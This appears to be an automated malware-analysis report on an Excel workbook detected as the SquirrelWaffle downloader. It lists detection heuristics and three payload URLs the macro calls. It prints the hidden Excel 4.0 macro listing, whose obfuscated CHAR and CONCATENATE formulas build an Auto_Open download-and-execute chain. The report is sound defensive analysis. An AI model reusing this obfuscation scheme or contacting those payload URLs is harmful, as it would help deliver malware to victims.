Verdict: MALICIOUS
Risk Score: 302

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file contains Excel 4.0 macros, specifically an Auto_Open defined name that utilizes dangerous functions like ShellExecute and constructs URLs from cell arrays. These macros are designed to download and execute a second-stage payload from one of the three embedded URLs, as indicated by the ClamAV detection and heuristic firings. The reconstructed URL is "https://generatorulubabanu.ro/gD4xRuhIPb/sot.html".
Heuristics (7)

- ClamAV: Xls.Downloader.SquirrelWaffle20921-9895790-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Downloader.SquirrelWaffle20921-9895790-0
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- URL reconstructed from XLM cell array (3 URLs) (critical, OLE_XLM_CELL_ARRAY_URL): Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells that a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
- Reference to ShellExecute API (high, SC_STR_SHELLEXEC): Reference to ShellExecute API
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - https://generatorulubabanu.ro/gD4xRuhIPb/sot.html (referenced by macro)
  - https://ottawaprocessservers.ca/Cct1pa3E/sot.html (referenced by macro)
  - https://totallybaked.ca/QrCCMgkEM7p/sot.html (referenced by macro)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 9672 bytes | 1f55e9f0a91d0734a14528f6f311ff204196878cc1cea0f1bf639ccf94bbeb61 |
Preview script (first 1,000 lines of the extracted script):
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Shee
' 0085 10 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - G
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - ra
' 0085 11 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - kn
' 0085 15 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - gerhrs
' 0085 12 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - gfh
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - e3ef
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - esrg
' 0085 12 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - rye
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - fhdr
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - thdh
' 0085 12 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - thr
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - ecf
' 0085 11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - rg
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - efg
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - reg
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - fdsf
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - efe
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - gfege
' 0018 29 LABEL : Cell Value, String Constant - _xlfn.ARABIC hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d rg!H1
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' ra,D1,CHAR(200-86),""
' ra,G2,CHAR(109-61),""
' ra,K2,CHAR(190-91),""
' ra,O2,CHAR(150-68),""
' ra,C3,CHAR(200-99),""
' ra,M3,CHAR(184-99),""
' ra,H4,CHAR(200-133),""
' ra,N4,CHAR(179-103),""
' ra,B5,CHAR(200-125),""
' ra,E5,CHAR(101-50),""
' ra,J5,CHAR(250-134),""
' ra,P5,CHAR(230-130),""
' ra,F7,CHAR(100-50),""
' ra,I7,CHAR(210-113),""
' ra,L7,CHAR(220-109),""
' ra,Q7,CHAR(157-88),""
' ra,N8,CHAR(180-61),""
' ra,A9,CHAR(201-91),""
' ra,C9,CHAR(210-102),""
' ra,H10,CHAR(140-72),""
' ra,J10,CHAR(230-109),""
' ra,P10,CHAR(186-102),""
' ra,D11,CHAR(140-91),""
' ra,L11,CHAR(192-100),""
' ra,E12,CHAR(190-75),""
' ra,I12,CHAR(220-115),""
' ra,Q12,CHAR(190-70),""
' ra,S12,CHAR(207-104),""
' ra,B13,CHAR(101-36),""
' ra,O13,CHAR(160-90),""
' ra,K14,CHAR(145-99),""
' ra,D15,CHAR(145-71),""
' ra,G15,CHAR(210-93),""
' ra,P15,CHAR(190-86),""
' ra,T15,CHAR(197-85),""
' ra,L16,CHAR(150-84),""
' ra,E17,CHAR(230-172),""
' ra,I17,CHAR(205-96),""
' ra,Q17,CHAR(240-122),""
' ra,N18,CHAR(150-67),""
' ra,B19,CHAR(220-108),""
' ra,J21,CHAR(108-55),""
' ra,H32,_xlfn.ARABIC("CXI"),""
' ra,D35,_xlfn.ARABIC("CI"),""
' ra,K46,_xlfn.ARABIC("LXV"),""
' kn,I2,"CONCATENATE( Shee!S24, Shee!N18, Shee!P15, Shee!C3, Shee!C9, Shee!C9, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
' kn,Q4,"CONCATENATE( Shee!S24, Shee!L7, Shee!T15, Shee!C3, Shee!A9, Shee!S24, Shee!S25)",""
' kn,D5,"CONCATENATE( Shee!S24, Shee!H4, Shee!D1, Shee!C3, Shee!I7, Shee!J5, Shee!C3,, Shee!H10, Shee!I12, Shee!D1, Shee!C3, Shee!K2, Shee!J5, Shee!L7, Shee!D1, Shee!J10, Shee!B13, Shee!S24, Shee!S25)",""
' kn,L7,"CONCATENATE( Shee!S24, Shee!N18, Shee!P15, Shee!C3, Shee!C9, Shee!C9, Shee!Q7, Shee!Q12, Shee!C3, Shee!K2, Shee!G15, Shee!J5, Shee!C3, Shee!B13, Shee!S24, Shee!S25)",""
' kn,S7,"CONCATENATE( Shee!S24, Shee!D1, Shee!C3, Shee!S12, Shee!E12, Shee!Q17, Shee!D1, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
' kn,H9,"CONCATENATE( Shee!S24, Shee!M3, Shee!O2,)",""
' kn,F10,"CONCATENATE( Shee!S24, Shee!D15, Shee!H4, Shee!D15, Shee!S24, Shee!S25)",""
' kn,O11,"CONCATENATE( Shee!S24, Shee!D15, Shee!D15, Shee!H4, Shee!H4, Shee!H4, Shee!D15, Shee!D15, Shee!S24, Shee!S25)",""
' kn,B13,"CONCATENATE( Shee!S24, Shee!B5, Shee!C3, Shee!D1, Shee!A9, Shee!C3, Shee!C9, Shee!E5, Shee!F7, Shee!S24, Shee!S25)",""
' kn,H14,"CONCATENATE( Shee!S24, Shee!D15, Shee!D15, Shee!H4, Shee!H4, Shee!L16, Shee!L16, Shee!S24, Shee!S25)",""
' kn,F15,"CONCATENATE( Shee!S24, Shee!G15, Shee!D1, Shee!C9, Shee!I17, Shee!L7, Shee!A9, Shee!S24, Shee!S25)",""
' kn,D17,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!S24, Shee!S25)",""
' kn,B21,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!D11, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
' kn,G24,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
' kn,E28,"CONCATENATE( Shee!S24, Shee!H4, Shee!E17, Shee!L11, Shee!H10, Shee!I7, Shee!J5, Shee!L7, Shee!B19, Shee!L11, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!F7, Shee!K14, Shee!J5, Shee!C3, Shee!E12, Shee!J5, Shee!S24, Shee!S25)",""
' gerhrs,I10,"CONCATENATE( Shee!N4, Shee!H10,)",""
' gfh,I11,"CONCATENATE( Shee!L7, Shee!N8,)",""
' e3ef,H12,"CONCATENATE( Shee!A9, Shee!C9,)",""
' esrg,J8,"CONCATENATE( Shee!L7, Shee!I7,)",""
' rye,I11,"CONCATENATE( Shee!P5, Shee!P10,)",""
' fhdr,N8,"CONCATENATE(, Shee!O13, Shee!I12, Shee!C9, Shee!S46)",""
' thdh,I12,"CONCATENATE( Shee!B13, Shee!S24, Shee!S25)",""
' thr,F9,"CONCATENATE( Shee!G2, Shee!S25)",""
' ecf,H8,"FORMULA( G!B13, ra!H21)=FORMULA( G!D5, ra!H22)=FORMULA( thr!D4, kn!E22)=FORMULA( G!F10, ra!H23)=FORMULA( ecf!G14, thdh!I9)=FORMULA( G!D17, ra!H24)=FORMULA( G!H9& gerhrs!I10& gfh!I11& e3ef!H12& esrg!J8& rye!I11& thdh!I9& fhdr!N8& kn!E22& reg!I12, ra!H27)=FORMULA( Shee!G2, ra!H25)=FORMULA( G!F15, ra!H26)=FORMULA( efg!F9, ra!H29)=FORMULA( G!H14, ra!H28)=FORMULA( G!G24, ra!H31)=FORMULA( G!I2, ra!H34)=FORMULA( G!L7, ra!H35)=FORMULA( fdsf!D19, efe!C18)=FORMULA( G!O11, ra!H36)=FORMULA( G!Q4, ra!H38)=FORMULA( G!B21, ra!H58)=FORMULA( G!S7, ra!H39)=FORMULA( G!G24, ra!H40)=FORMULA( G!E28, ra!H60)=FORMULA( Shee!J21, ra!H42)=FORMULA( Shee!P31& Shee!P33& efe!C18& Shee!P35& Shee!P35& Shee!P36& ra!H21& ra!H22& ra!H23& ra!H24& ra!H25& Shee!P37, rg!H20)=FORMULA( Shee!P31& Shee!P33& efe!C18& Shee!P35& Shee!P35& Shee!P36& ra!H34& ra!H35& ra!H36& ra!H29& ra!H38& ra!H39& ra!H40& ra!H29& ra!H42& Shee!P37, rg!H24)=FORMULA( Shee!P31& Shee!P33& efe!C18& Shee!P35& Shee!P35& Shee!P36& ra!H26& ra!H27& ra!H28& ra!H29& G!I18& ra!H31& ra!H29& ra!H25& Shee!P37, rg!H22)=FORMULA( Shee!P31& Shee!P33& efe!C18& Shee!P35& Shee!P35& Shee!P36& ra!H26& ra!H27& ra!H28& ra!H29& G!I19& ra!H58& ra!H29& ra!H25& Shee!P37, rg!H26)=FORMULA( Shee!P31& Shee!P33& efe!C18& Shee!P35& Shee!P35& Shee!P36& ra!H34& ra!H35& ra!H36& ra!H29& ra!H38& ra!H39& ra!H58& ra!H29& ra!H42& Shee!P37, rg!H28)=FORMULA( Shee!P31& Shee!P33& efe!C18& Shee!P35& Shee!P35& Shee!P36& ra!H26& ra!H27& ra!H28& ra!H29& G!I20& ra!H60& ra!H29& ra!H25& Shee!P37, rg!H30)=FORMULA( Shee!P31& Shee!P33& efe!C18& Shee!P35& Shee!P35& Shee!P36& ra!H34& ra!H35& ra!H36& ra!H29& ra!H38& ra!H39& ra!H60& ra!H29& ra!H42& Shee!P37, rg!H32)",""
' efg,D11,"FORMULA(CHAR(200-99), thdh!I9)",""
' reg,G14,CHAR( Shee!H32),""
' fdsf,D4,CHAR( Shee!D35),""
' gfege,D19,CHAR( Shee!K46),""